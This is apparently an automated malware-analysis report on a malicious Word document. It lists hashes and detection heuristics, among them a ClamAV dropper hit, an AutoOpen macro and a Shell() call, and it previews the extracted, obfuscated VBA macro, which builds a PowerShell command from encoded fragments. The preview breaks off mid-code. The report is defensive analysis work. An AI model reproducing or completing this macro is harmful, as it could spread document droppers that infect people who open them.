Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd54d27e266b24e7…

MALICIOUS

Office (OLE)

97.8 KB Created: 2018-06-19 17:25:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 8e54bb6fb7c875e96123ec954bba1dd2 SHA-1: 7e48c0a48e73a74ccf1bf5d7201e0a29602f52ee SHA-256: bd54d27e266b24e7ee3d54acb02c4477431557606af97a9c3778680b856f6e30
242 Risk Score

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6600001-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6600001-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11080 bytes
SHA-256: fa2f11a03ec10990a5458811f67e8df59a5361b242f0c4fe55bd513d4e89bfc5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "CwHXkhsHNj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KcvZJVMa"
Function zJRWMQvS()
On Error Resume Next
aWzsGB = 40140
wjmrnw = 40624
swLZid = GkMqU
tvoBr = CByte(okYZE)
HYJjE = CDate(lWNQm + Sin(51511 + 34821) * 13492 * CInt(13681))
sdkLUn = CDate(7179)
dFIfnsVKlUG = "OwerSHell" + " [STrInG]" + "::jOiN(" + " '' ,( " + "'99-49Y61>45"
rlNAv = 26422
FwoiRX = 14812
nHzXOZ = wjFEb
dZlWIT = CByte(cijdW)
miLFmq = CDate(zXuQGu + Sin(37775 + 11925) * 73698 * CInt(10440))
zsMQa = CDate(73132)
rkhYAwITYrX = "m54g46@10" + "3%122Z103@41Z" + "34" + "Z48u106g" + "40Y37%45u34-" + "36&" + "51m1" + "03u53@38m41%3" + "5>40-42&124>99"
wiKEq = 5144
kRfZFk = 31087
wUvEG = kbbww
cjtGH = CByte(nizPT)
VhTKY = CDate(OWcYSd + Sin(17972 + 99121) * 42867 * CInt(99882))
inHiuv = CDate(61898)
OPlhOnj = "u4>55%61@44&" + "37@40m1" + "03>1" + "22Y103m41%34-48"
DmEVfo = 32399
PihjEQ = 2558
wNiCai = TVodhA
zqdjR = CByte(WwakV)
ftIZS = CDate(bkdRor + Sin(75561 + 10860) * 83163 * CInt(76337))
Riizd = CDate(33781)
fOoiliD = "m1" + "06@40-37-" + "45Y34>36g51Z1" + "03>20@62u52>51" + "-34g4" + "2u105%9u34m51" + "Z105m16g34Z" + "37u4m43-46@34Y"
zJRWMQvS = dFIfnsVKlUG + rkhYAwITYrX + OPlhOnj + fOoiliD
End Function
Function DQYKkfLBn()
On Error Resume Next
QwBnz = 46627
mqXsf = 73220
DkmzuQ = QLOds
hIZuzz = CByte(mJFLY)
FikMwU = CDate(boihCz + Sin(52851 + 76956) * 61841 * CInt(7021))
wIzDc = CDate(63293)
jPzvVj = "41g" + "51u" + "124u99" + "Z21@16u40m43Z" + "43@103@122u" + "103Z96Z47&5" + "1>51Z55@1" + "25Z104-104u48g"
SmrBU = 10559
wcLpz = 59876
hFBwDq = CiLEV
IaiIc = CByte(RZwwFn)
REwoo = CDate(ppbZz + Sin(4279 + 29870) * 86757 * CInt(20208))
siJZz = CDate(93321)
MHjQtmHZh = "48@48Z10" + "5Y35u40@36u" + "47>40Y46m44&4" + "6%35u" + "52-" + "105Y36Y" + "40m42m104g31>13"
Qjzqku = 3891
dpTUE = 52223
mdmWqS = CNiCjj
XADYai = CByte(cTvwHa)
mFAun = CDate(Mrlht + Sin(53878 + 85575) * 60414 * CInt(4236))
tGdDU = CDate(53397)
AMzDfFWMAZ = "-15" + "g3&" + "54m13u5" + "4>116" + ">104m7m4" + "7>51&" + "51-55&1" + "25>104u104u48%4" + "8Y48u105m37m4" + "0@40"
cmwtC = 61798
ncfkhN = 8556
wqBtY = lDvdZ
iWrbrZ = CByte(FRTJwh)
CuHcJq = CDate(qGkiw + Sin(64812 + 92351) * 62445 * CInt(84761))
CcHvQ = CDate(20103)
wwpnQu = "m42m55@38" + "Y36>44m1" + "05Z36g40m4" + "2Z104m10m119m3u"
mbhko = 90836
kwhjXO = 21022
CSdpW = UCzOZU
azANWk = CByte(waJidd)
lEiPEH = CDate(RHdiO + Sin(65645 + 21340) * 8141 * CInt(91181))
ZNMkn = CDate(56847)
DQbTmZuN = "55g22@2m119" + "Y104Z7" + "u47&51%51" + "-55m125%104" + ">104%48Z48@48-" + "105Z47m" + "38Z36m46Y38-"
DQYKkfLBn = jPzvVj + MHjQtmHZh + AMzDfFWMAZ + wwpnQu + DQbTmZuN
End Function
Function mdPiDBrp()
On Error Resume Next
EihoAi = 95686
zRcpf = 35520
EBaFG = aZbKkK
DPvKUS = CByte(hVAJPT)
DjwWIa = CDate(lpnJE + Sin(10352 + 31194) * 75571 * CInt(3565))
NHtkw = CDate(70975)
nEAHznSmR = "53>34&52Y40" + "-53@51u105>" + "36>" + "40-42@10"
VZcYoz = 58666
LscwfM = 99530
uXnXD = jaric
OuZFp = CByte(uJlzzX)
QQEEP = CDate(JwIaUa + Sin(28218 + 26027) * 30141 * CInt(19536))
hPjbGj = CDate(51601)
cIhcLTwSn = "4-45u3g49Z" + "38-4Z30>12-63g1" + "15u104Z" + "7&4" + "7Z51-51Z55" + "Z125Z104g104-4" + "8g48u48%105>3" + "3m53Y38g41%" + "44%52Y42&" + "46%52g52Y46>"
XAaDE = 80500
BZokK = 55817
iIKcS = NRlokQ
iwiTA = CByte(WLLmz)
nBrCa = CDate(loDVj + Sin(5506 + 24424) * 50523 * CInt(60940))
NVdYN = CDate(64780)
tNunv = "40Y41g105Z36" + "u40m42u104-49m" + "19%117%2Z3" + "3Z10" + "g104%7g47m" + "51Z51&55m125" + "u10" + "4%104%48" + "@48Z48>105" + "g36"
naQlfU = CDate(78314)
nuHDO = 70581
UJzIkK = CDate(jBGNi + Sin(62345 + 45040) * 79139 * CInt(3504))
ziiYk = zQBhN
WYuvmV = 35961
qckmm = CByte(RzPDFn)
wtQMaMol = ">38Y4" + "1-36Z40g42g46&3" + "6Y105m36%40u42u" + "104Z23Y35-46Y" + "6m53u19" + "%29-10" + "4m96m105@2"
idDFfi = CD
... (truncated)